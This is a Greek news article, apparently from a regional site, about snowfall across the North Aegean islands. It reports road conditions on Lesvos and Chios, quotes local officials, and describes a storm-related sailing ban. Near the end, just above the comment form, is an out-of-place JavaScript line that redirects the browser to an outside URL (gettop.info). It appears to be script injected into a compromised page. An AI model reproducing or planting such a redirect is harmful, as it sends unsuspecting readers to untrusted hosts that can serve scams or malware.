Στα λευκά ντύθηκαν και όλα τα νησιά του Βορείου Αιγαίου (ΕΙΚΟΝΕΣ)

0
82

 

Στη Λέσβο έχει χιονίσει στα ορεινά ενώ χιονόνερο ρίχνει μέσα στην πόλη της Μυτιλήνης.

Ανοιχτοί σύμφωνα με τον αρμόδιο αντιδήμαρχο Νίκο Καρασάβα παραμένουν όλοι οι δρόμοι στις περιοχές όπου χιονίζει και συγκεκριμένα στον ορεινό όγκο του Ολύμπου στην περιοχή της Αγιάσου και στις περιοχές Αμπελικού και Μεγαλοχωρίου, στον ορεινό όγκο του Λεπετύμνου βόρεια του Μανταμάδου και στη δυτική Λέσβο στις περιοχές Σκαλοχωρίου, Άντισσας, Βατούσας και Χιδήρων.

agiasos-3

agiasos-4

Σύμφωνα με το φωτογραφικό ρεπορτάζ του agiasos.gr, όλη η περιοχή έχει καλυφθεί από πυκνό στρώμα χιονιού ενώ συνεχίζεται η έντονη χιονόπτωση.

agiasos

Eπίσης, πλούσιο φωτογραφικό ρεπορτάζ φιλοξενεί και το lesvosnews.gr, καθώς όλο το νησί έχει ντυθεί στα λευκά.

mytilini-1

mytilini-2

Χιόνια και στη βόρεια Χίο όπου γίνεται προσπάθεια να παραμείνουν ανοιχτοί οι δρόμοι. Χιόνια και στα ορεινά της Σάμου.

Από τα ξημερώματα της Πέμπτης τα μηχανήματα της Περιφερειακής Ενότητας Χίου δίνουν μάχη προκειμένου οι δρόμοι στη βόρεια Χίο να παραμείνουν ανοιχτοί.

Σύμφωνα με τα ΠΣΕΑ της Περιφέρειας αλλά και την Τροχαία Χίου ο δρόμος από το ύψωμα 18 και βορειότερα έχει κλείσει. Προβληματικό σημείο θεωρείται και αυτό από τα Διευχά μέχρι και τη Σπαρτούντα ενώ πάνω από 10 πόντους είναι το χιόνι από τον μοναστήριο του Αγίου Μάρκου στον Προβατά και δυτικότερα.

«Αν συνεχίσει έτσι η κατάσταση τα προβλήματα θα ενταθούν. Είναι πολύ πιθανό με την πτώση του αέρα να έχουμε χιονόπτωση ακόμα και στο κέντρο της πόλης», ανέφερε ο Δ. Κουντουριάδης στον «Πολίτη Χίου».

Λόγω των θυελλωδών ανέμων απαγορεύθηκε ο απόπλους των πλοίων από και προς τα νησιά. Το απαγορευτικό «έπιασε» στο λιμάνι της Μυτιλήνης το πλοίο «Νήσος Μύκονος», προερχόμενο από Καβάλα και Λήμνο με προορισμό τη Χίο και τη Σάμο.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here